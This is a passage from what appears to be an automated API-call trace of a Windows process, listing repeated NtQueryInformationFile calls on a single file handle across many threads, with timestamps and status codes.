FileHandle=0x680, IoStatusBlock=0x47ffbc0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffbc0, FileInformation=0x44d8128) returned 0x0 Thread: id = 402 os_tid = 0x7c4 [0151.995] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfa48, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfa48, FileInformation=0x44d8128) returned 0x0 Thread: id = 403 os_tid = 0x790 [0151.996] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efcb8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efcb8, FileInformation=0x44d8128) returned 0x0 Thread: id = 404 os_tid = 0x688 [0151.998] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fd58, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fd58, FileInformation=0x44d8128) returned 0x0 Thread: id = 405 os_tid = 0x240 [0152.000] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480fce8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480fce8, FileInformation=0x44d8128) returned 0x0 Thread: id = 406 os_tid = 0x8e0 [0152.002] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x433fd98, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x433fd98, FileInformation=0x44d8128) returned 0x0 Thread: id = 407 os_tid = 0x880 [0152.003] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfd98, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfd98, FileInformation=0x44d8128) returned 0x0 Thread: id = 408 os_tid = 0x8f0 [0152.006] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fed0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fed0, FileInformation=0x44d8128) returned 0x0 Thread: id = 409 os_tid = 0xa18 [0152.008] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fe78, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fe78, FileInformation=0x44d8128) returned 0x0 Thread: id = 410 os_tid = 0x8a0 [0152.009] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476f950, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476f950, FileInformation=0x44d8128) returned 0x0 Thread: id = 411 os_tid = 0x870 [0152.011] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436feb0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436feb0, FileInformation=0x44d8128) returned 0x0 Thread: id = 412 os_tid = 0x9a0 [0152.016] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489ff18, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489ff18, FileInformation=0x44d8128) returned 0x0 Thread: id = 413 os_tid = 0x2c4 [0152.018] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fad0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fad0, FileInformation=0x44d8128) returned 0x0 Thread: id = 414 os_tid = 0x890 [0152.020] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486f9d0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486f9d0, FileInformation=0x44d8128) returned 0x0 Thread: id = 415 os_tid = 0x4e8 [0152.022] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485f828, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485f828, FileInformation=0x44d8128) returned 0x0 Thread: id = 416 os_tid = 0xcc [0152.023] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x435fdc8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x435fdc8, FileInformation=0x44d8128) returned 0x0 Thread: id = 417 os_tid = 0xd0 [0152.025] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfc08, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfc08, FileInformation=0x44d8128) returned 0x0 Thread: id = 418 os_tid = 0xd4 [0152.027] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479ff60, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479ff60, FileInformation=0x44d8128) returned 0x0 Thread: id = 419 os_tid = 0xd8 [0152.029] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490fca8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490fca8, FileInformation=0x44d8128) returned 0x0 Thread: id = 420 os_tid = 0xdc [0152.031] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fcb0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fcb0, FileInformation=0x44d8128) returned 0x0 Thread: id = 421 os_tid = 0xe0 [0152.033] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fc00, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fc00, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 422 os_tid = 0xe4 [0152.035] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfb90, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfb90, FileInformation=0x44d8128) returned 0x0 Thread: id = 423 os_tid = 0xe8 [0152.036] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fb38, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fb38, FileInformation=0x44d8128) returned 0x0 Thread: id = 424 os_tid = 0xec [0152.038] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478fa40, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478fa40, FileInformation=0x44d8128) returned 0x0 Thread: id = 425 os_tid = 0x748 [0152.040] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x435fc70, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x435fc70, FileInformation=0x44d8128) returned 0x0 Thread: id = 426 os_tid = 0xc4 [0152.041] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fc88, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fc88, FileInformation=0x44d8128) returned 0x0 Thread: id = 427 os_tid = 0x620 [0152.043] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fe88, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fe88, FileInformation=0x44d8128) returned 0x0 Thread: id = 428 os_tid = 0x910 [0152.045] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477ff70, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477ff70, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 429 os_tid = 0x950 [0152.046] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ef850, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ef850, FileInformation=0x44d8128) returned 0x0 Thread: id = 430 os_tid = 0x940 [0152.048] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f8c0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f8c0, FileInformation=0x44d8128) returned 0x0 Thread: id = 431 os_tid = 0x980 [0152.050] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cfd28, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cfd28, FileInformation=0x44d8128) returned 0x0 Thread: id = 432 os_tid = 0xa10 [0152.051] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fe98, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fe98, FileInformation=0x44d8128) returned 0x0 Thread: id = 433 os_tid = 0x72c [0152.053] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffc00, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffc00, FileInformation=0x44d8128) returned 0x0 Thread: id = 434 os_tid = 0x9e0 [0152.054] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fd78, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fd78, FileInformation=0x44d8128) returned 0x0 Thread: id = 435 os_tid = 0x9c4 [0152.056] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fa30, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fa30, FileInformation=0x44d8128) returned 0x0 Thread: id = 436 os_tid = 0xa6c [0152.058] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fa48, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fa48, FileInformation=0x44d8128) returned 0x0 Thread: id = 437 os_tid = 0xb00 [0152.059] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fe08, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fe08, FileInformation=0x44d8128) returned 0x0 Thread: id = 438 os_tid = 0xaf8 [0152.061] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479ff68, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479ff68, FileInformation=0x44d8128) returned 0x0 Thread: id = 439 os_tid = 0xae4 [0152.063] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fab8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fab8, FileInformation=0x44d8128) returned 0x0 Thread: id = 440 os_tid = 0x344 [0152.065] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492f918, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492f918, FileInformation=0x44d8128) returned 0x0 Thread: id = 441 os_tid = 0x808 [0152.067] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490f818, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490f818, FileInformation=0x44d8128) returned 0x0 Thread: id = 442 os_tid = 0x858 [0152.069] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484fa50, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484fa50, FileInformation=0x44d8128) returned 0x0 Thread: id = 443 os_tid = 0x224 [0152.071] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afc08, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afc08, FileInformation=0x44d8128) returned 0x0 Thread: id = 444 os_tid = 0x4dc [0152.073] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fa60, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fa60, FileInformation=0x44d8128) returned 0x0 Thread: id = 445 os_tid = 0x78c [0152.074] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfb60, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfb60, FileInformation=0x44d8128) returned 0x0 Thread: id = 446 os_tid = 0xb0 [0152.076] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fc50, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fc50, FileInformation=0x44d8128) returned 0x0 Thread: id = 447 os_tid = 0x314 [0152.078] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48ef7d0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48ef7d0, FileInformation=0x44d8128) returned 0x0 Thread: id = 448 os_tid = 0x804 [0152.079] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fca0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fca0, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 449 os_tid = 0x854 [0152.081] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fe10, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fe10, FileInformation=0x44d8128) returned 0x0 Thread: id = 450 os_tid = 0xa78 [0152.083] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef868, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef868, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 451 os_tid = 0x6a8 [0152.085] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efac0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efac0, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 452 os_tid = 0x7a8 [0152.086] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fe78, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fe78, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 453 os_tid = 0x330 [0152.088] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fea0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fea0, FileInformation=0x44d8128) returned 0x0 Thread: id = 454 os_tid = 0x3a4 [0152.090] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fb58, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fb58, FileInformation=0x44d8128) returned 0x0 Thread: id = 455 os_tid = 0x67c [0152.091] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f840, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f840, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 456 os_tid = 0x5cc [0152.093] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fc30, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fc30, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 457 os_tid = 0x840 [0152.095] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48af8c8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48af8c8, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 458 os_tid = 0x69c [0152.097] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fe90, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fe90, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 459 os_tid = 0x6f0 [0152.099] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cf9b0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cf9b0, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 460 os_tid = 0x810 [0152.102] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fba8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fba8, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 461 os_tid = 0xa88 [0152.104] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fba8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fba8, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 462 os_tid = 0x43c [0152.105] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fd08, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fd08, FileInformation=0x44d8128) returned 0x0 Thread: id = 463 os_tid = 0x670 [0152.107] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x433ff58, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x433ff58, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 464 os_tid = 0xa14 [0152.109] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fcf0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fcf0, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 465 os_tid = 0x990 [0152.110] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476ff10, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476ff10, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 466 os_tid = 0x2dc [0152.112] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479ff70, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479ff70, FileInformation=0x44d8128) returned 0x0 Thread: id = 467 os_tid = 0x74c [0152.113] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fe28, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fe28, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 468 os_tid = 0x3c4 [0152.115] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fc80, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fc80, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 469 os_tid = 0x90 [0152.117] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47afc98, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47afc98, FileInformation=0x44d8128) returned 0x0 Thread: id = 470 os_tid = 0x630 [0152.119] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477faa0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477faa0, FileInformation=0x44d8128) returned 0x0 Thread: id = 471 os_tid = 0x124 [0152.120] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfb00, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfb00, FileInformation=0x44d8128) returned 0x0 Thread: id = 472 os_tid = 0xc0 [0152.123] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fc60, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fc60, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 473 os_tid = 0x360 [0152.125] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfb50, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfb50, FileInformation=0x44d8128) returned 0x0 Thread: id = 474 os_tid = 0x920 [0152.127] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffbc0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffbc0, FileInformation=0x44d8128) returned 0x0 Thread: id = 475 os_tid = 0xbec [0152.128] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fe08, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fe08, FileInformation=0x44d8128) returned 0x0 Thread: id = 476 os_tid = 0x6b8 [0152.130] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffc68, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffc68, FileInformation=0x44d8128) returned 0x0 Thread: id = 477 os_tid = 0x30c [0152.132] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cfe10, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cfe10, FileInformation=0x44d8128) returned 0x0 Thread: id = 478 os_tid = 0xbfc [0152.134] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f7a8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f7a8, FileInformation=0x44d8128) returned 0x0 Thread: id = 479 os_tid = 0x3f8 [0152.136] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fc20, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fc20, FileInformation=0x44d8128) returned 0x0 Thread: id = 480 os_tid = 0x6cc [0152.138] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fea8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fea8, FileInformation=0x44d8128) returned 0x0 Thread: id = 481 os_tid = 0x830 [0152.140] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fcf0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fcf0, FileInformation=0x44d8128) returned 0x0 Thread: id = 482 os_tid = 0x75c [0152.142] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fae8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fae8, FileInformation=0x44d8128) returned 0x0 Thread: id = 483 os_tid = 0x7f0 [0152.146] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494fb10, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494fb10, FileInformation=0x44d8128) returned 0x0 Thread: id = 484 os_tid = 0x710 [0152.148] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486f9c8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486f9c8, FileInformation=0x44d8128) returned 0x0 Thread: id = 485 os_tid = 0x5d8 [0152.150] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfda8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfda8, FileInformation=0x44d8128) returned 0x0 Thread: id = 486 os_tid = 0xbe4 [0152.151] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f7c0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f7c0, FileInformation=0x44d8128) returned 0x0 Thread: id = 487 os_tid = 0x600 [0152.153] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484f9f0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484f9f0, FileInformation=0x44d8128) returned 0x0 Thread: id = 488 os_tid = 0xbd0 [0152.155] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cf9d0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cf9d0, FileInformation=0x44d8128) returned 0x0 Thread: id = 489 os_tid = 0x158 [0152.156] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476f7f0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476f7f0, FileInformation=0x44d8128) returned 0x0 Thread: id = 490 os_tid = 0xbd8 [0152.158] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477feb0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477feb0, FileInformation=0x44d8128) returned 0x0 Thread: id = 491 os_tid = 0xbe8 [0152.159] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fc68, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fc68, FileInformation=0x44d8128) returned 0x0 Thread: id = 492 os_tid = 0xbdc [0152.161] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494fc78, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494fc78, FileInformation=0x44d8128) returned 0x0 Thread: id = 493 os_tid = 0x5b4 [0152.163] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f7b0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f7b0, FileInformation=0x44d8128) returned 0x0 Thread: id = 494 os_tid = 0x614 [0152.165] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483ff30, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483ff30, FileInformation=0x44d8128) returned 0x0 Thread: id = 495 os_tid = 0x690 [0152.167] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484fa50, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484fa50, FileInformation=0x44d8128) returned 0x0 Thread: id = 496 os_tid = 0xa68 [0152.169] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dff50, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dff50, FileInformation=0x44d8128) returned 0x0 Thread: id = 497 os_tid = 0x7d0 [0152.170] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489ff68, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489ff68, FileInformation=0x44d8128) returned 0x0 Thread: id = 498 os_tid = 0x7d8 [0152.172] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fcc8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fcc8, FileInformation=0x44d8128) returned 0x0 Thread: id = 499 os_tid = 0x24c [0152.174] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fb30, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fb30, FileInformation=0x44d8128) returned 0x0 Thread: id = 500 os_tid = 0x9f8 [0152.175] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47df9c0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47df9c0, FileInformation=0x44d8128) returned 0x0 Thread: id = 501 os_tid = 0x798 [0152.178] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480f928, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480f928, FileInformation=0x44d8128) returned 0x0 Thread: id = 502 os_tid = 0xa3c [0152.180] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfb88, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfb88, FileInformation=0x44d8128) returned 0x0 Thread: id = 503 os_tid = 0x8c0 [0152.181] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f8f8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f8f8, FileInformation=0x44d8128) returned 0x0 Thread: id = 504 os_tid = 0x708 [0152.183] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480fc10, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480fc10, FileInformation=0x44d8128) returned 0x0 Thread: id = 505 os_tid = 0xa64 [0152.186] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff9c0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff9c0, FileInformation=0x44d8128) returned 0x0 Thread: id = 506 os_tid = 0xa30 [0152.187] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fcd8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fcd8, FileInformation=0x44d8128) returned 0x0 Thread: id = 507 os_tid = 0x388 [0152.190] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494f860, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494f860, FileInformation=0x44d8128) returned 0x0 Thread: id = 508 os_tid = 0x760 [0152.192] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fcd0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fcd0, FileInformation=0x44d8128) returned 0x0 Thread: id = 509 os_tid = 0xa54 [0152.193] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfdd0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfdd0, FileInformation=0x44d8128) returned 